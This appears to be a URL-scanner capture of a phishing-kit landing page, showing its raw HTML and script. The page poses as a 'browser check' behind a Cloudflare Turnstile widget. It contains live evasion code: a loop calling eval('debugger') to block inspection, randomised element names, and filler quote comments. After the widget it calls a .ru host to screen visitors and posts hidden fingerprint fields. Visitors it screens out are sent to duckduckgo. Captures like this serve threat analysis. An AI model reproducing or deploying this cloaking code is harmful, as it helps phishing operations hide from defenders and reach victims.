https://pi.lrwks.com/7PXU/

Submitted URL:
https://pi.lrwks.com/7PXU/
Report Finished:

The outgoing links identified from the page

JavaScript Variables · 10 found

Global JavaScript variables loaded on the window object of a page, are variables declared outside of functions and accessible from anywhere in the code within the current scope

Console log messages · 5 found

Messages logged to the web console

HTML

The raw HTML body of the page

<html lang="en"><head>


    <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>
    <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="robots" content="noindex, nofollow">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>​</title>
    <style>
body {
  background-color: #fff;
  height: 100%;
  overflow: hidden;
}
#xxymkmImYv h4{margin-top:0;margin-bottom:.5rem;font-weight:500;line-height:1.2;}
#xxymkmImYv h4{font-size:calc(1.3);}
@media (min-width:1200px){
#xxymkmImYv h4{font-size:1.5rem;}
}
#xxymkmImYv p{margin-top:0;margin-bottom:1rem;}
#xxymkmImYv.container{width: 100%;padding-right: var(--bs-gutter-x, .75rem);padding-left: var(--bs-gutter-x, .75rem);margin-right: auto;margin-left: auto;}
#xxymkmImYv .text-center {text-align: center!important;}
@media (min-width:992px){
#xxymkmImYv .col-lg-4{flex:0 0 auto;width:33.33333333%;}
}
#xxymkmImYv .display-4 {font-size: 1.25rem!important;}
#xxymkmImYv .mt-2 {margin-top: 0.5rem!important;}
#xxymkmImYv .h4 {font-size: calc(.900rem + .3vw);}
#xxymkmImYv .justify-content-center{justify-content:center!important;}
#xxymkmImYv.mt-5{margin-top:3rem!important;}
#xxymkmImYv .mt-4 {margin-top: 1rem!important;}
#xxymkmImYv #jBHFDxCDmD {color: #6c757d;font-size:14px;margin-top: .5rem;}
    </style>
    <script>
    setInterval(() => {
    const t0 = Date.now();
    eval('debugger');
    const t1 = Date.now();
    }, 1000);
    </script>
<!-- All our dreams can come true if we have the courage to pursue them. -->
</head>

<!-- <div>I find that the harder I work, the more luck I seem to have.</div> -->
<body style="font-family: arial, sans-serif;background-color: #fff;color: #000;padding: 20px;font-size: 18px;overscroll-behavior: contain;">
<!-- The only limit to our realization of tomorrow will be our doubts of today. -->
<div id="xxymkmImYv" class="container">
<div id="uwJeyOzHRF" class="row justify-content-center">
<div class="text-center">
<!-- <div>The successful warrior is the average man, with laser-like focus.</div> -->
<form id="aPBWjfEKka">
<div class="cf_turnstile" id="cf"><div><input type="hidden" name="cf-turnstile-response" id="cf-chl-widget-5knh4_response"></div></div>
<!-- <div>Success is not the key to happiness. Happiness is the key to success. If you love what you are doing, you will be successful.</div> -->
<input type="hidden" id="sid" name="sid" value="23JmwzK3fwOJmVwYDxyoxvNleATx6pGHEZU6f53z">
<input type="hidden" id="pagelink" name="pagelink" value="">
<input type="hidden" id="bltdip" name="bltdip" value="Unknown">
<input type="hidden" id="bltdref" name="bltdref" value="">
<input type="hidden" id="bltdua" name="bltdua" value="Unknown">
<!-- Success is the sum of small efforts, repeated day in and day out. -->
<input type="hidden" id="bltddata" name="bltddata" value="">
</form>
<!-- Success is not how high you have climbed, but how you make a positive difference to the world. -->
</div>
<div class="text-center" id="jBHFDxCDmD">
Performing browser checks for safe connection.
<!-- I find that the harder I work, the more luck I seem to have. -->
</div>

</div>
<!-- Success is not the key to happiness. Happiness is the key to success. -->
</div>

<!-- Don&#039;t be afraid to give up the good to go for the great. -->
<script>
turnstile.render('#cf', {
    sitekey: '0x4AAAAAAAilzjQWObi-dXnj',
    'error-callback': MjfQOuiJyg,
    callback: lBiQkkoFrb,
});
function MjfQOuiJyg() {
    turnstile.reset();
}
function lBiQkkoFrb() {
    var uKztixurJV = document.getElementById("aPBWjfEKka");
    uKztixurJV.onsubmit = function (event) {
        event.preventDefault();
    };
    document.getElementById("pagelink").value = 'x4v5I';
    var ejxFvIlype = "../hfig9ZSnwWxj0oJOVi7o9zf6hANxorBez4snFbHCvhY3rw";
    fetch('https://1tGbR1O52joR1y179zoQF8KHr3ULzQXX5eQf5u3lArqb3M2FniH.gatertati.ru/nmhohwhyydlbididatvgyURUlWQRGZOQERNJRJGATRJEIIJRVYLEMVXBNWOFXYNOOZMXQWBV', {
    method: "GET",
    }).then(response => {
    return response.text()
    }).then(text => {
    console.log(text);
    if(text == 0){
    fetch(ejxFvIlype, {
        method: "POST",
        body: new FormData(uKztixurJV)
    }).then(response => {
        return response.json();
    }).then(data => {
        if(data['status'] == 'success'){
        location.reload();
        }
        if(data['status'] == 'error'){
        window.location.replace('https://duckduckgo.com');
        }
    });
    }
    if(text != 0){
    window.location.replace('https://duckduckgo.com');
    }
    })
    .catch(error => {
    window.location.replace('https://duckduckgo.com');
    });
}
</script>




</body></html><!-- Success is finding satisfaction in giving a little more than you take. -->